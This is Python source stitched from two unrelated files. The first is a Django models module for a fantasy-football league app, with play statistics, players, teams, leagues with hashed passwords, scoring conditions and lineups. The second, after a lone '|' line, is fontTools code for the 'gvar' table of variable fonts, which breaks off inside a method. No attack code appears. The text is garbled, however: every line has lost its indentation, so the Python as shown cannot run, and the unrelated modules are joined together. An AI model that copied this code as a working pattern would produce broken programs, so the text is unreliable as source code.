fumbles_rec = models.SmallIntegerField(default=0)
fumbles_rec_tds = models.SmallIntegerField(default=0)
fumbles_rec_yds = models.SmallIntegerField(default=0)
fumbles_tot = models.SmallIntegerField(default=0)
kicking_all_yds = models.SmallIntegerField(default=0)
kicking_downed = models.SmallIntegerField(default=0)
kicking_fga = models.SmallIntegerField(default=0)
kicking_fgb = models.SmallIntegerField(default=0)
kicking_fgm = models.SmallIntegerField(default=0)
kicking_fgm_yds = models.SmallIntegerField(default=0)
kicking_fgmissed = models.SmallIntegerField(default=0)
kicking_fgmissed_yds = models.SmallIntegerField(default=0)
kicking_i20 = models.SmallIntegerField(default=0)
kicking_rec = models.SmallIntegerField(default=0)
kicking_rec_tds = models.SmallIntegerField(default=0)
kicking_tot = models.SmallIntegerField(default=0)
kicking_touchback = models.SmallIntegerField(default=0)
kicking_xpa = models.SmallIntegerField(default=0)
kicking_xpb = models.SmallIntegerField(default=0)
kicking_xpmade = models.SmallIntegerField(default=0)
kicking_xpmissed = models.SmallIntegerField(default=0)
kicking_yds = models.SmallIntegerField(default=0)
kickret_fair = models.SmallIntegerField(default=0)
kickret_oob = models.SmallIntegerField(default=0)
kickret_ret = models.SmallIntegerField(default=0)
kickret_tds = models.SmallIntegerField(default=0)
kickret_touchback = models.SmallIntegerField(default=0)
kickret_yds = models.SmallIntegerField(default=0)
passing_att = models.SmallIntegerField(default=0)
passing_cmp = models.SmallIntegerField(default=0)
passing_cmp_air_yds = models.SmallIntegerField(default=0)
passing_incmp = models.SmallIntegerField(default=0)
passing_incmp_air_yds = models.SmallIntegerField(default=0)
passing_int = models.SmallIntegerField(default=0)
passing_sk = models.SmallIntegerField(default=0)
passing_sk_yds = models.SmallIntegerField(default=0)
passing_tds = models.SmallIntegerField(default=0)
passing_twopta = models.SmallIntegerField(default=0)
passing_twoptm = models.SmallIntegerField(default=0)
passing_twoptmissed = models.SmallIntegerField(default=0)
passing_yds = models.SmallIntegerField(default=0)
penalty = models.SmallIntegerField(default=0)
penalty_first_down = models.SmallIntegerField(default=0)
penalty_yds = models.SmallIntegerField(default=0)
punting_blk = models.SmallIntegerField(default=0)
punting_i20 = models.SmallIntegerField(default=0)
punting_tot = models.SmallIntegerField(default=0)
punting_touchback = models.SmallIntegerField(default=0)
punting_yds = models.SmallIntegerField(default=0)
puntret_downed = models.SmallIntegerField(default=0)
puntret_fair = models.SmallIntegerField(default=0)
puntret_oob = models.SmallIntegerField(default=0)
puntret_tds = models.SmallIntegerField(default=0)
puntret_tot = models.SmallIntegerField(default=0)
puntret_touchback = models.SmallIntegerField(default=0)
puntret_yds = models.SmallIntegerField(default=0)
receiving_rec = models.SmallIntegerField(default=0)
receiving_tar = models.SmallIntegerField(default=0)
receiving_tds = models.SmallIntegerField(default=0)
receiving_twopta = models.SmallIntegerField(default=0)
receiving_twoptm = models.SmallIntegerField(default=0)
receiving_twoptmissed = models.SmallIntegerField(default=0)
receiving_yac_yds = models.SmallIntegerField(default=0)
receiving_yds = models.SmallIntegerField(default=0)
rushing_att = models.SmallIntegerField(default=0)
rushing_first_down = models.SmallIntegerField(default=0)
rushing_loss = models.SmallIntegerField(default=0)
rushing_loss_yds = models.SmallIntegerField(default=0)
rushing_tds = models.SmallIntegerField(default=0)
rushing_twopta = models.SmallIntegerField(default=0)
rushing_twoptm = models.SmallIntegerField(default=0)
rushing_twoptmissed = models.SmallIntegerField(default=0)
rushing_yds = models.SmallIntegerField(default=0)
third_down_att = models.SmallIntegerField(default=0)
third_down_conv = models.SmallIntegerField(default=0)
third_down_failed = models.SmallIntegerField(default=0)
timeout = models.SmallIntegerField(default=0)
xp_aborted = models.SmallIntegerField(default=0)
def __repr__(self):
return (f"{{'model': 'PlayPlayer', 'player': '{self.player.player_id}', "
f"'game_id': '{self.play.drive.game.game_id}', 'drive_id': "
f"{self.play.drive.drive_id}, 'play_id': {self.play.play_id}}}")
def __str__(self):
return (f"{{Player '{self.player.player_id}' from Play {self.play.play_id} "
f"from Drive {self.play.drive.drive_id} from Game "
f"'{self.play.drive.game.game_id}'}}")
def __eq__(self, other):
if isinstance(other, PlayPlayer):
return (self.id == other.id)
else:
return NotImplemented
def __hash__(self):
return hash(('PlayPlayer', self.id))
class Player(models.Model):
player_id = models.CharField(primary_key=True, max_length=36)
name = models.TextField()
team = models.ForeignKey('Team', models.DO_NOTHING, db_column='team', null=True)
position = models.TextField()
status = models.TextField(null=True)
jersey_number = models.SmallIntegerField(null=True)
def __repr__(self):
return f"{{'model': 'Player', 'player_id': '{self.player_id}'}}"
def __str__(self):
return f"{{{self.name} {self.position} {self.team.team_id}}}"
def __eq__(self, other):
if isinstance(other, Player):
return (self.player_id == other.player_id)
else:
return NotImplemented
def __hash__(self):
return hash(('Player', self.player_id))
def data_dict(self):
return {'id': self.player_id, 'name': self.name, 'team': self.team.team_id,
        'position': self.position, 'status': self.status}
def is_locked(self):
season_year, season_type, week = get_current_week()
this_game = (Game.objects.filter(home_team=self.team,
season_type=season_type, season_year=season_year, week=week) |
(Game.objects.filter(away_team=self.team, season_type=season_type,
season_year=season_year, week=week)))
if len(this_game) == 1:
game_start = this_game[0].start_time.replace(tzinfo=pytz.UTC)
now = datetime.datetime.now(pytz.UTC)
if game_start < now:
return True
return False
class Team(models.Model):
team_id = models.CharField(primary_key=True, max_length=3)
name = models.TextField()
active = models.BooleanField()
def __repr__(self):
return f"{{'model': 'Team', 'team_id': '{self.team_id}'}}"
def __str__(self):
return f"{{{self.name}}}"
def __eq__(self, other):
if isinstance(other, Team):
return (self.team_id == other.team_id)
else:
return NotImplemented
def __hash__(self):
return hash(('Team', self.team_id))
def data_dict(self):
return {'id': self.team_id, 'name': self.name}
class League(models.Model):
name = models.TextField()
# league password is stored as hash
password = models.TextField()
# the fields below hold the number of each position included in a league's lineup
db = models.SmallIntegerField(default=0)
dl = models.SmallIntegerField(default=0)
k = models.SmallIntegerField(default=0)
lb = models.SmallIntegerField(default=0)
ol = models.SmallIntegerField(default=0)
p = models.SmallIntegerField(default=0)
qb = models.SmallIntegerField(default=0)
rb = models.SmallIntegerField(default=0)
te = models.SmallIntegerField(default=0)
wr = models.SmallIntegerField(default=0)
# pre-built position list for convenience
positions = ['db', 'dl', 'k', 'lb', 'ol', 'p', 'qb', 'rb', 'te', 'wr']
def __repr__(self):
return f"{{'model': 'League', 'name': '{self.name}'}}"
def __str__(self):
return f"{{League {self.name}}}"
def __eq__(self, other):
if isinstance(other, League):
return (self.name == other.name)
else:
return NotImplemented
def __hash__(self):
return hash(('League', self.name))
def correct_password(self, password):
return bool(compare_hash(self.password, password))
def get_lineup_settings(self):
lineup = {}
for pos in self.positions:
if getattr(self, pos):
lineup[pos.upper()] = getattr(self, pos)
return lineup
def set_lineup_settings(self, lineup_settings):
for pos in self.positions:
if pos.upper() in lineup_settings:
setattr(self, pos, lineup_settings[pos.upper()])
else:
setattr(self, pos, 0)
self.save()
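# Illustrative lineup-settings dict handled by the two methods above; keys are
# upper-cased position codes from `positions`, values are roster counts, e.g.
# {'QB': 1, 'RB': 2, 'WR': 2, 'TE': 1, 'K': 1}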
def get_scoring_settings(self):
scoring = []
for stat in LeagueStat.objects.filter(league=self):
scoring.append({'name': stat.name, 'field': stat.field,
'conditions': [], 'multiplier': float(stat.multiplier)})
if stat.conditions:
for condition in StatCondition.objects.filter(league_stat=stat):
scoring[-1]['conditions'].append({'field': condition.field,
'comparison': condition.comparison, 'value': condition.value})
return scoring
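# Illustrative shape of the scoring settings returned by get_scoring_settings()
# and accepted by set_scoring_settings(); names and values are examples only,
# 'field' entries must be StatField values and 'comparison' a Comparison choice:
# [{'name': 'Passing TDs', 'field': 'passing_tds', 'multiplier': 4.0,
#   'conditions': []},
#  {'name': 'Long Rush', 'field': 'rushing_yds', 'multiplier': 1.0,
#   'conditions': [{'field': 'rushing_yds', 'comparison': '>=', 'value': 40}]}]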
def set_scoring_settings(self, scoring):
# remove any stats that aren't in the new settings
all_names = [stat['name'] for stat in scoring]
for stat in LeagueStat.objects.filter(league=self):
if stat.name not in all_names:
stat.delete()
# add the new stats
for stat in scoring:
stat_row = LeagueStat.objects.get_or_create(league=self,
name=stat['name'])[0]
stat_row.field = stat['field']
stat_row.multiplier = stat['multiplier']
stat_row.save()
if stat['conditions']:
stat_row.conditions = True
stat_row.save()
# remove the old conditions
for condition in StatCondition.objects.filter(league_stat=stat_row):
condition.delete()
# add the new ones
for condition in stat['conditions']:
# get_or_create avoids duplicate condition rows; the (object, created)
# tuple it returns is not needed here
StatCondition.objects.get_or_create(league_stat=stat_row,
                                    field=condition['field'],
                                    comparison=condition['comparison'],
                                    value=condition['value'])
def set_password(self, password):
self.password = generate_hash(password)
self.save()
def get_members(self):
return [member.user.username for member in
Member.objects.filter(league=self).order_by('user__username')]
class StatField(models.TextChoices):
DEFENSE_AST = 'defense_ast'
DEFENSE_FFUM = 'defense_ffum'
DEFENSE_FGBLK = 'defense_fgblk'
DEFENSE_FREC = 'defense_frec'
DEFENSE_FREC_TDS = 'defense_frec_tds'
DEFENSE_FREC_YDS = 'defense_frec_yds'
DEFENSE_INT = 'defense_int'
DEFENSE_INT_TDS = 'defense_int_tds'
DEFENSE_INT_YDS = 'defense_int_yds'
DEFENSE_MISC_TDS = 'defense_misc_tds'
DEFENSE_MISC_YDS = 'defense_misc_yds'
DEFENSE_PASS_DEF = 'defense_pass_def'
DEFENSE_PUNTBLK = 'defense_puntblk'
DEFENSE_QBHIT = 'defense_qbhit'
DEFENSE_SAFE = 'defense_safe'
DEFENSE_SK = 'defense_sk'
DEFENSE_SK_YDS = 'defense_sk_yds'
DEFENSE_TDS = 'defense_tds'
DEFENSE_TKL = 'defense_tkl'
DEFENSE_TKL_LOSS = 'defense_tkl_loss'
DEFENSE_TKL_LOSS_YDS = 'defense_tkl_loss_yds'
DEFENSE_TKL_PRIMARY = 'defense_tkl_primary'
DEFENSE_XPBLK = 'defense_xpblk'
FIRST_DOWN = 'first_down'
FOURTH_DOWN_ATT = 'fourth_down_att'
FOURTH_DOWN_CONV = 'fourth_down_conv'
FOURTH_DOWN_FAILED = 'fourth_down_failed'
FUMBLES_FORCED = 'fumbles_forced'
FUMBLES_LOST = 'fumbles_lost'
FUMBLES_NOTFORCED = 'fumbles_notforced'
FUMBLES_OOB = 'fumbles_oob'
FUMBLES_REC = 'fumbles_rec'
FUMBLES_REC_TDS = 'fumbles_rec_tds'
FUMBLES_REC_YDS = 'fumbles_rec_yds'
FUMBLES_TOT = 'fumbles_tot'
KICKING_ALL_YDS = 'kicking_all_yds'
KICKING_DOWNED = 'kicking_downed'
KICKING_FGA = 'kicking_fga'
KICKING_FGB = 'kicking_fgb'
KICKING_FGM = 'kicking_fgm'
KICKING_FGM_YDS = 'kicking_fgm_yds'
KICKING_FGMISSED = 'kicking_fgmissed'
KICKING_FGMISSED_YDS = 'kicking_fgmissed_yds'
KICKING_I20 = 'kicking_i20'
KICKING_REC = 'kicking_rec'
KICKING_REC_TDS = 'kicking_rec_tds'
KICKING_TOT = 'kicking_tot'
KICKING_TOUCHBACK = 'kicking_touchback'
KICKING_XPA = 'kicking_xpa'
KICKING_XPB = 'kicking_xpb'
KICKING_XPMADE = 'kicking_xpmade'
KICKING_XPMISSED = 'kicking_xpmissed'
KICKING_YDS = 'kicking_yds'
KICKRET_FAIR = 'kickret_fair'
KICKRET_OOB = 'kickret_oob'
KICKRET_RET = 'kickret_ret'
KICKRET_TDS = 'kickret_tds'
KICKRET_TOUCHBACK = 'kickret_touchback'
KICKRET_YDS = 'kickret_yds'
PASSING_ATT = 'passing_att'
PASSING_CMP = 'passing_cmp'
PASSING_CMP_AIR_YDS = 'passing_cmp_air_yds'
PASSING_FIRST_DOWN = 'passing_first_down'
PASSING_INCMP = 'passing_incmp'
PASSING_INCMP_AIR_YDS = 'passing_incmp_air_yds'
PASSING_INT = 'passing_int'
PASSING_SK = 'passing_sk'
PASSING_SK_YDS = 'passing_sk_yds'
PASSING_TDS = 'passing_tds'
PASSING_TWOPTA = 'passing_twopta'
PASSING_TWOPTM = 'passing_twoptm'
PASSING_TWOPTMISSED = 'passing_twoptmissed'
PASSING_YDS = 'passing_yds'
PENALTY = 'penalty'
PENALTY_FIRST_DOWN = 'penalty_first_down'
PENALTY_YDS = 'penalty_yds'
PUNTING_BLK = 'punting_blk'
PUNTING_I20 = 'punting_i20'
PUNTING_TOT = 'punting_tot'
PUNTING_TOUCHBACK = 'punting_touchback'
PUNTING_YDS = 'punting_yds'
PUNTRET_DOWNED = 'puntret_downed'
PUNTRET_FAIR = 'puntret_fair'
PUNTRET_OOB = 'puntret_oob'
PUNTRET_TDS = 'puntret_tds'
PUNTRET_TOT = 'puntret_tot'
PUNTRET_TOUCHBACK = 'puntret_touchback'
PUNTRET_YDS = 'puntret_yds'
RECEIVING_REC = 'receiving_rec'
RECEIVING_TAR = 'receiving_tar'
RECEIVING_TDS = 'receiving_tds'
RECEIVING_TWOPTA = 'receiving_twopta'
RECEIVING_TWOPTM = 'receiving_twoptm'
RECEIVING_TWOPTMISSED = 'receiving_twoptmissed'
RECEIVING_YAC_YDS = 'receiving_yac_yds'
RECEIVING_YDS = 'receiving_yds'
RUSHING_ATT = 'rushing_att'
RUSHING_FIRST_DOWN = 'rushing_first_down'
RUSHING_LOSS = 'rushing_loss'
RUSHING_LOSS_YDS = 'rushing_loss_yds'
RUSHING_TDS = 'rushing_tds'
RUSHING_TWOPTA = 'rushing_twopta'
RUSHING_TWOPTM = 'rushing_twoptm'
RUSHING_TWOPTMISSED = 'rushing_twoptmissed'
RUSHING_YDS = 'rushing_yds'
THIRD_DOWN_ATT = 'third_down_att'
THIRD_DOWN_CONV = 'third_down_conv'
THIRD_DOWN_FAILED = 'third_down_failed'
TIMEOUT = 'timeout'
XP_ABORTED = 'xp_aborted'
class LeagueStat(models.Model):
league = models.ForeignKey(League, on_delete=models.CASCADE)
name = models.TextField()
field = models.CharField(max_length=21, choices=StatField.choices)
# when true, look for conditions in StatCondition
conditions = models.BooleanField(default=False)
# used for calculating scores
multiplier = models.DecimalField(max_digits=10, decimal_places=2, default=0)
def __repr__(self):
return (f"{{'model': 'LeagueStat', 'league': '{self.league.name}', 'name': "
f"'{self.name}'}}")
def __str__(self):
return f"{{Stat '{self.name}' from League '{self.league.name}'}}"
def __eq__(self, other):
if isinstance(other, LeagueStat):
return (self.league == other.league and self.name == other.name)
else:
return NotImplemented
def __hash__(self):
return hash(('LeagueStat', self.league, self.name))
class StatCondition(models.Model):
class Comparison(models.TextChoices):
EQ = '='
GT = '>'
LT = '<'
GTE = '>='
LTE = '<='
league_stat = models.ForeignKey(LeagueStat, on_delete=models.CASCADE)
field = models.CharField(max_length=21, choices=StatField.choices)
comparison = models.CharField(max_length=2, choices=Comparison.choices)
value = models.SmallIntegerField(default=0)
def __repr__(self):
return (f"{{'model': 'StatCondition', 'league': "
f"'{self.league_stat.league.name}', 'stat': '{self.league_stat.name}', "
f"'field': '{self.field}', 'comparison': '{self.comparison}', "
f"'value': {self.value}}}")
def __str__(self):
return (f"{{Condition {self.field}{self.comparison}{self.value} for "
f"'{self.league_stat.name}' in League '{self.league_stat.league.name}'}}")
def __eq__(self, other):
if isinstance(other, StatCondition):
return (self.league_stat == other.league_stat and self.field == other.field
and self.comparison == other.comparison and self.value == other.value)
else:
return NotImplemented
def __hash__(self):
return hash(('StatCondition', self.league_stat, self.field, self.comparison,
self.value))
class Member(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
league = models.ForeignKey(League, on_delete=models.CASCADE)
admin = models.BooleanField(default=False)
def __repr__(self):
return (f"{{'model': 'Member', 'username': '{self.user.username}', 'league': "
f"'{self.league.name}'}}")
def __str__(self):
return f"{{User '{self.user.username}' in League '{self.league.name}'}}"
def __eq__(self, other):
if isinstance(other, Member):
return (self.user.username == other.user.username and self.league ==
other.league)
else:
return NotImplemented
def __hash__(self):
return hash(('Member', self.user.username, self.league))
def is_admin(self):
return self.admin
def get_lineup(self, season_type='', season_year='', week=''):
if not season_type or not season_year or not week:
season_year, season_type, week = get_current_week()
lineup_entries = Lineup.objects.filter(member=self, season_type=season_type,
season_year=season_year, week=week).order_by('player__position')
return [entry.player.data_dict() for entry in lineup_entries]
def lineup_delete(self, player_id, season_type='', season_year='', week=''):
if not season_type or not season_year or not week:
season_year, season_type, week = get_current_week()
row = Lineup.objects.filter(member=self, season_type=season_type,
season_year=season_year, week=week, player_id=player_id)
if len(row) == 1:
row[0].delete()
def lineup_add(self, player_id, season_type='', season_year='', week=''):
if not season_type or not season_year or not week:
season_year, season_type, week = get_current_week()
Lineup.objects.create(member=self, season_type=season_type,
season_year=season_year, week=week, player_id=player_id)
class Lineup(models.Model):
member = models.ForeignKey(Member, on_delete=models.CASCADE)
season_year = models.SmallIntegerField()
season_type = models.CharField(max_length=4, choices=SeasonType.choices)
week = models.SmallIntegerField()
player = models.ForeignKey(Player, on_delete=models.CASCADE)
def __repr__(self):
return (f"{{'model': 'Lineup', 'user': '{self.member.user.username}', "
f"'league': '{self.member.league.name}', 'season_year': {self.season_year}, "
f"'season_type': '{self.season_type}', 'week': {self.week}, "
f"'player_id': '{self.player.player_id}'}}")
def __str__(self):
return (f"{{Player '{self.player.player_id}' for User '{self.member.user.username}' "
f"in League '{self.member.league.name}' for '{self.season_type}' "
f"{self.season_year} week {self.week}}}")
def __eq__(self, other):
if isinstance(other, Lineup):
return (self.member == other.member and self.season_year ==
other.season_year and self.season_type == other.season_type and
self.week == other.week and self.player == other.player)
else:
return NotImplemented
def __hash__(self):
return hash(('Lineup', self.member, self.season_year, self.season_type,
self.week, self.player))
|
from __future__ import print_function, division, absolute_import
from fontTools.misc.py23 import *
from fontTools import ttLib
from fontTools.misc import sstruct
from fontTools.misc.fixedTools import fixedToFloat, floatToFixed
from fontTools.misc.textTools import safeEval
from fontTools.ttLib import TTLibError
from . import DefaultTable
import array
import io
import sys
import struct
import logging
log = logging.getLogger(__name__)
# Apple's documentation of 'gvar':
# https://developer.apple.com/fonts/TrueType-Reference-Manual/RM06/Chap6gvar.html
#
# FreeType2 source code for parsing 'gvar':
# http://git.savannah.gnu.org/cgit/freetype/freetype2.git/tree/src/truetype/ttgxvar.c
GVAR_HEADER_FORMAT = """
> # big endian
version: H
reserved: H
axisCount: H
sharedCoordCount: H
offsetToCoord: I
glyphCount: H
flags: H
offsetToData: I
"""
GVAR_HEADER_SIZE = sstruct.calcsize(GVAR_HEADER_FORMAT)
TUPLES_SHARE_POINT_NUMBERS = 0x8000
TUPLE_COUNT_MASK = 0x0fff
EMBEDDED_TUPLE_COORD = 0x8000
INTERMEDIATE_TUPLE = 0x4000
PRIVATE_POINT_NUMBERS = 0x2000
TUPLE_INDEX_MASK = 0x0fff
DELTAS_ARE_ZERO = 0x80
DELTAS_ARE_WORDS = 0x40
DELTA_RUN_COUNT_MASK = 0x3f
POINTS_ARE_WORDS = 0x80
POINT_RUN_COUNT_MASK = 0x7f
class table__g_v_a_r(DefaultTable.DefaultTable):
dependencies = ["fvar", "glyf"]
def compile(self, ttFont):
axisTags = [axis.axisTag for axis in ttFont["fvar"].axes]
sharedCoords = self.compileSharedCoords_(axisTags)
sharedCoordIndices = {coord:i for i, coord in enumerate(sharedCoords)}
sharedCoordSize = sum([len(c) for c in sharedCoords])
compiledGlyphs = self.compileGlyphs_(ttFont, axisTags, sharedCoordIndices)
offset = 0
offsets = []
for glyph in compiledGlyphs:
offsets.append(offset)
offset += len(glyph)
offsets.append(offset)
compiledOffsets, tableFormat = self.compileOffsets_(offsets)
header = {}
header["version"] = self.version
header["reserved"] = self.reserved
header["axisCount"] = len(axisTags)
header["sharedCoordCount"] = len(sharedCoords)
header["offsetToCoord"] = GVAR_HEADER_SIZE + len(compiledOffsets)
header["glyphCount"] = len(compiledGlyphs)
header["flags"] = tableFormat
header["offsetToData"] = header["offsetToCoord"] + sharedCoordSize
compiledHeader = sstruct.pack(GVAR_HEADER_FORMAT, header)
result = [compiledHeader, compiledOffsets]
result.extend(sharedCoords)
result.extend(compiledGlyphs)
return bytesjoin(result)
def compileSharedCoords_(self, axisTags):
coordCount = {}
for variations in self.variations.values():
for gvar in variations:
coord = gvar.compileCoord(axisTags)
coordCount[coord] = coordCount.get(coord, 0) + 1
sharedCoords = [(count, coord) for (coord, count) in coordCount.items() if count > 1]
sharedCoords.sort(reverse=True)
MAX_NUM_SHARED_COORDS = TUPLE_INDEX_MASK + 1
sharedCoords = sharedCoords[:MAX_NUM_SHARED_COORDS]
return [c[1] for c in sharedCoords] # Strip off counts.
def compileGlyphs_(self, ttFont, axisTags, sharedCoordIndices):
result = []
for glyphName in ttFont.getGlyphOrder():
glyph = ttFont["glyf"][glyphName]
numPointsInGlyph = self.getNumPoints_(glyph)
result.append(self.compileGlyph_(glyphName, numPointsInGlyph, axisTags, sharedCoordIndices))
return result
def compileGlyph_(self, glyphName, numPointsInGlyph, axisTags, sharedCoordIndices):
variations = self.variations.get(glyphName, [])
variations = [v for v in variations if v.hasImpact()]
if len(variations) == 0:
return b""
# Each glyph variation tuple modifies a set of control points. To indicate
# which exact points are getting modified, a single tuple can either refer
# to a shared set of points, or the tuple can supply its private point numbers.
# Because the impact of sharing can be positive (no need for a private point list)
# or negative (need to supply 0,0 deltas for unused points), it is not obvious
# how to determine which tuples should take their points from the shared
# pool versus have their own. Perhaps we should resort to brute force,
# and try all combinations? However, if a glyph has n variation tuples,
# we would need to try 2^n combinations (because each tuple may or may not
# be part of the shared set). How many variation tuples do glyphs have?
#
# Skia.ttf: {3: 1, 5: 11, 6: 41, 7: 62, 8: 387, 13: 1, 14: 3}
# JamRegular.ttf: {3: 13, 4: 122, 5: 1, 7: 4, 8: 1, 9: 1, 10: 1}
# BuffaloGalRegular.ttf: {1: 16, 2: 13, 4: 2, 5: 4, 6: 19, 7: 1, 8: 3, 9: 18}
# (Reading example: In Skia.ttf, 41 glyphs have 6 variation tuples).
#
# Is this even worth optimizing? If we never use a shared point list,
# the private lists will consume 112K for Skia, 5K for BuffaloGalRegular,
# and 15K for JamRegular. If we always use a shared point list,
# the shared lists will consume 16K for Skia, 3K for BuffaloGalRegular,
# and 10K for JamRegular. However, in the latter case the delta arrays
# will become larger, but I haven't yet measured by how much. From
# gut feeling (which may be wrong), the optimum is to share some but
# not all points; however, then we would need to try all combinations.
#
# For the time being, we try two variants and then pick the better one:
# (a) each tuple supplies its own private set of points;
# (b) all tuples refer to a shared set of points, which consists of
# "every control point in the glyph".
allPoints = set(range(numPointsInGlyph))
tuples = []
data = []
someTuplesSharePoints = False
for gvar in variations:
privateTuple, privateData = gvar.compile(axisTags, sharedCoordIndices, sharedPoints=None)
sharedTuple, sharedData = gvar.compile(axisTags, sharedCoordIndices, sharedPoints=allPoints)
# TODO: If we use shared points, Apple MacOS X 10.9.5 cannot display our fonts.
# This is probably a problem with our code; find the problem and fix it.
#if (len(sharedTuple) + len(sharedData)) < (len(privateTuple) + len(privateData)):
if False:
tuples.append(sharedTuple)
data.append(sharedData)
someTuplesSharePoints = True
else:
tuples.append(privateTuple)
data.append(privateData)
if someTuplesSharePoints:
data = bytechr(0) + bytesjoin(data) # 0x00 = "all points in glyph"
tupleCount = TUPLES_SHARE_POINT_NUMBERS | len(tuples)
else:
data = bytesjoin(data)
tupleCount = len(tuples)
tuples = bytesjoin(tuples)
result = struct.pack(">HH", tupleCount, 4 + len(tuples)) + tuples + data
if len(result) % 2 != 0:
result = result + b"\0" # padding
return result
def decompile(self, data, ttFont):
axisTags = [axis.axisTag for axis in ttFont["fvar"].axes]
glyphs = ttFont.getGlyphOrder()
sstruct.unpack(GVAR_HEADER_FORMAT, data[0:GVAR_HEADER_SIZE], self)
assert len(glyphs) == self.glyphCount
assert len(axisTags) == self.axisCount
offsets = self.decompileOffsets_(data[GVAR_HEADER_SIZE:], tableFormat=(self.flags & 1), glyphCount=self.glyphCount)
sharedCoords = self.decompileSharedCoords_(axisTags, data)
self.variations = {}
for i in range(self.glyphCount):
glyphName = glyphs[i]
glyph = ttFont["glyf"][glyphName]
numPointsInGlyph = self.getNumPoints_(glyph)
gvarData = data[self.offsetToData + offsets[i] : self.offsetToData + offsets[i + 1]]
self.variations[glyphName] = \
self.decompileGlyph_(numPointsInGlyph, sharedCoords, axisTags, gvarData)
def decompileSharedCoords_(self, axisTags, data):
result, _pos = GlyphVariation.decompileCoords_(axisTags, self.sharedCoordCount, data, self.offsetToCoord)
return result
@staticmethod
def decompileOffsets_(data, tableFormat, glyphCount):
if tableFormat == 0:
# Short format: array of UInt16
offsets = array.array("H")
offsetsSize = (glyphCount + 1) * 2
else:
# Long format: array of UInt32
offsets = array.array("I")
offsetsSize = (glyphCount + 1) * 4
offsets.fromstring(data[0 : offsetsSize])
if sys.byteorder != "big":
offsets.byteswap()
# In the short format, offsets need to be multiplied by 2.
# This is not documented in Apple's TrueType specification,
# but can be inferred from the FreeType implementation, and
# we could verify it with two sample GX fonts.
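# (e.g. a stored short-format value of 5 corresponds to byte offset 10)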
if tableFormat == 0:
offsets = [off * 2 for off in offsets]
return offsets
@staticmethod
def compileOffsets_(offsets):
"""Packs a list of offsets into a 'gvar' offset table.
Returns a pair (bytestring, tableFormat). Bytestring is the
packed offset table. Format indicates whether the table
uses short (tableFormat=0) or long (tableFormat=1) integers.
The returned tableFormat should get packed into the flags field
of the 'gvar' header.
"""
assert len(offsets) >= 2
for i in range(1, len(offsets)):
assert offsets[i - 1] <= offsets[i]
if max(offsets) <= 0xffff * 2:
packed = array.array("H", [n >> 1 for n in offsets])
tableFormat = 0
else:
packed = array.array("I", offsets)
tableFormat = 1
if sys.byteorder != "big":
packed.byteswap()
return (packed.tostring(), tableFormat)
def decompileGlyph_(self, numPointsInGlyph, sharedCoords, axisTags, data):
if len(data) < 4:
return []
numAxes = len(axisTags)
tuples = []
flags, offsetToData = struct.unpack(">HH", data[:4])
pos = 4
dataPos = offsetToData
if (flags & TUPLES_SHARE_POINT_NUMBERS) != 0:
sharedPoints, dataPos = GlyphVariation.decompilePoints_(numPointsInGlyph, data, dataPos)
else:
sharedPoints = []
for _ in range(flags & TUPLE_COUNT_MASK):
dataSize, flags = struct.unpack(">HH", data[pos:pos+4])
tupleSize = GlyphVariation.getTupleSize_(flags, numAxes)
tupleData = data[pos : pos + tupleSize]
pointDeltaData = data[dataPos : dataPos + dataSize]
tuples.append(self.decompileTuple_(numPointsInGlyph, sharedCoords, sharedPoints, axisTags, tupleData, pointDeltaData))
pos += tupleSize
dataPos += dataSize
return tuples
@staticmethod
def decompileTuple_(numPointsInGlyph, sharedCoords, sharedPoints, axisTags, data, tupleData):
flags = struct.unpack(">H", data[2:4])[0]
pos = 4
if (flags & EMBEDDED_TUPLE_COORD) == 0:
coord = sharedCoords[flags & TUPLE_INDEX_MASK]
else:
coord, pos = GlyphVariation.decompileCoord_(axisTags, data, pos)
if (flags & INTERMEDIATE_TUPLE) != 0:
minCoord, pos = GlyphVariation.decompileCoord_(axisTags, data, pos)
maxCoord, pos = GlyphVariation.decompileCoord_(axisTags, data, pos)
else:
minCoord, maxCoord = table__g_v_a_r.computeMinMaxCoord_(coord)
axes = {}
for axis in axisTags:
coords = minCoord[axis], coord[axis], maxCoord[axis]
if coords != (0.0, 0.0, 0.0):
axes[axis] = coords
pos = 0
if (flags & PRIVATE_POINT_NUMBERS) != 0:
points, pos = GlyphVariation.decompilePoints_(numPointsInGlyph, tupleData, pos)
else:
points = sharedPoints
deltas_x, pos = GlyphVariation.decompileDeltas_(len(points), tupleData, pos)
deltas_y, pos = GlyphVariation.decompileDeltas_(len(points), tupleData, pos)
deltas = [None] * numPointsInGlyph
for p, x, y in zip(points, deltas_x, deltas_y):
if 0 <= p < numPointsInGlyph:
deltas[p] = (x, y)
return GlyphVariation(axes, deltas)
@staticmethod
def computeMinMaxCoord_(coord):
minCoord = {}
maxCoord = {}
for (axis, value) in coord.items():
minCoord[axis] = min(value, 0.0) # -0.3 --> -0.3; 0.7 --> 0.0
maxCoord[axis] = max(value, 0.0) # -0.3 --> 0.0; 0.7 --> 0.7
return (minCoord, maxCoord)
def toXML(self, writer, ttFont, progress=None):
writer.simpletag("version", value=self.version)
writer.newline()
writer.simpletag("reserved", value=self.reserved)
writer.newline()
axisTags = [axis.axisTag for axis in ttFont["fvar"].axes]
for glyphName in ttFont.getGlyphOrder():
variations = self.variations.get(glyphName)
if not variations:
continue
writer.begintag("glyphVariations", glyph=glyphName)
writer.newline()
for gvar in variations:
gvar.toXML(writer, axisTags)
writer.endtag("glyphVariations")
writer.newline()
def fromXML(self, name, attrs, content, ttFont):
if name == "version":
self.version = safeEval(attrs["value"])
elif name == "reserved":
self.reserved = safeEval(attrs["value"])
elif name == "glyphVariations":
if not hasattr(self, "variations"):
self.variations = {}
glyphName = attrs["glyph"]
glyph = ttFont["glyf"][glyphName]
numPointsInGlyph = self.getNumPoints_(glyph)
glyphVariations = []
for element in content:
if isinstance(element, tuple):
name, attrs, content = element
if name == "tuple":
gvar = GlyphVariation({}, [None] * numPointsInGlyph)
glyphVariations.append(gvar)
for tupleElement in content:
if isinstance(tupleElement, tuple):
tupleName, tupleAttrs, tupleContent = tupleElement
gvar.fromXML(tupleName, tupleAttrs, tupleContent)
self.variations[glyphName] = glyphVariations
@staticmethod
def getNumPoints_(glyph):
NUM_PHANTOM_POINTS = 4
if glyph.isComposite():
return len(glyph.components) + NUM_PHANTOM_POINTS
else:
# Empty glyphs (e.g. space, nonmarkingreturn) have no "coordinates" attribute.
return len(getattr(glyph, "coordinates", [])) + NUM_PHANTOM_POINTS
class GlyphVariation(object):
def __init__(self, axes, coordinates):
self.axes = axes
self.coordinates = coordinates
def __repr__(self):
